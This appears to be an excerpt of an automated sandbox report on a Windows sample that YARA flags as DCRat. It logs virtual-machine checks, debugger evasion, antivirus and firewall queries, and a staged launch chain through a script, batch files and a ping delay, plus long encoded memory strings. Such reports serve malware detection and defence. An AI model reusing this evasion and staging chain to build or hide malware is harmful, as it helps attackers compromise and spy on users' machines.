Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594563	Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

API call chain: ExitProcess graph end node

graph_0-23875

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B350000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: o9jDrpZrgR.exe, 00000000.00000003.2003620547.0000000002C13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56d
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012DDC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]0
Source: o9jDrpZrgR.exe, 00000000.00000002.2005588333.0000000002C13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012D19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: axzpJdFIUOgoa85qsUCgb5A1B9t8Pv7oKDmQIMW1wLYDVooFo81h6LQIf5AvDfUFwo2B5tjjaE+LaCF4ol4oAmZfeGwv7EvFOrtDffFjGYtS/X3J6jTM/XnJgYT6WSMuqI90zkcHQait6+5IRBriPUFoO/8WszfDDXQQiF/LAat9MdjcWhxKAb1SCS0xng8FmrUEoHmpmAMOl1rDPYFGxJ9zVpvc7whHGuCLomzDYlonLXGAUluH4xHE/2ro4PRrYk4G0nG2fLRwehAMrY6MbwtFWcD/LEhMdQfjSXY2qFlqXgC826IDm5NsLbBePvgjtTFCbY0sTU5qOPty5OZoVQGTY1tGBkcTg4kViQT/fGV0cH4FIuXYPASmVT/juk87AZuC9MzdoFdTM+Wwzk3McyVrEinBqZ4KJHDac+0D25IAXJ+cjCeujSzdCTZP6yzpoolS+ASncOjQK9Lp2KJTCaXhdJrogMcoVZiUew8NFHCkL8hMTySHiQydSmMcTZhXTQNeYd1Dq/40mgmwZb1pwDyfgQqnYgOJ5Yn+hNb4amT0Cp+9p7lrx7pB4uJZoaznNZhkOgdGU5szMAAZymw7KGhNLSkvT8ezQxM8VszmcRAb//oimR/AlwgA2Y5lbgsNTCU7I+irW5I9Ed3EpaZSteHB8UgqTfZnxwenUrFvtyYSXRuS/T3t+1MxCgHGOLSUUC60qPQHOo01mkgw9GtLJYa7EtuNZylaxu0PA5NBsOLpQjBQcUeawrxzmDZbmGro8Pb2DoE2NWrEoNbh/EsoTUzOhhbFu3v743GLmYxA+lKRwczfan0wIrkYLR/aX8KeHqxnVDbNDSmfh3ojSWHov2G3UwxUCHriib7USFZYXQw2ZfIDKOJjqRjCahUIjoAYzyQSo/qBDk6lKAXBI8BsAaYAlr7t6agxG0DUK3kAGtflh4dGk5lq8hwLueGmhiOxqPD0S7wu0G2OjnIoOI0MEblNyT69AmGtaa3whIwOLx2ZHhtHzlw285YYojSwHWj/cn42iFYIpAxlbICCowO50qCvQIbbb19sC+lmy2haDc6b6A3kSY0a+Oc4i4Ek1t6mBjLtkXT0B5Ix17TF6nhFFHtq2hKJLI+xiE9VqcGk/g0HCNG/WPQYBw6HR8ZGBjtGRpOG72xPBndOpjKgJtksABqRGZq0shke43bcj23+US6M5HekYSK6zMgZVmeTCewNklO8jkjo9eBdwB0fsZwxgxbCkYDhrmiP7oVCtLfmxnjlaHxxN7IGJ60MtEPw0HKs52YMXpwyre7YFVMDGfIw4whhmqkBkExW9u7HSrJUvwBE9En7aK+bSA5zNp2Amgn5wCThZmEpfmjbXBHMp0aRK28iiPpNOJQqxwU/WxDKgXqcWSx9B0JfII3QPZhGLEdiTX4Z8MMV0Y8Fr80PXLx6lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WE
Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012C19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: utyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B350000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware18NDMH1XWin32_VideoControllerY9NW_VBFVideoController120060621000000.000000-00017497634display.infMSBDA7KTEMOCRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colorsS2W36O4K
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012D19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B379000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_0089E6A3 VirtualQuery,GetSystemInfo,

0_2_0089E6A3

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0088A69B
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0089C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0089C220
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008AB348 FindFirstFileExA,	0_2_008AB348

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_008A7DEE mov eax, dword ptr fs:[00000030h]

0_2_008A7DEE

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_0089F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0089F838

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_008AC030 GetProcessHeap,

0_2_008AC030

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0089F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0089F838
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0089F9D5 SetUnhandledExceptionFilter,	0_2_0089F9D5
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0089FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0089FBCA
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008A8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008A8EBD

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exe	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"	Jump to behavior

Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0089AF0F

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Queries volume information: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe VolumeInformation	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Queries volume information: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_0089F654 cpuid

0_2_0089F654

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_0089DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0089DF1E

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_0088B146 GetVersionExW,

0_2_0088B146

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B403000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: o9jDrpZrgR.exe, type: SAMPLE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.657270c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.BlockrefBrokerperf.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
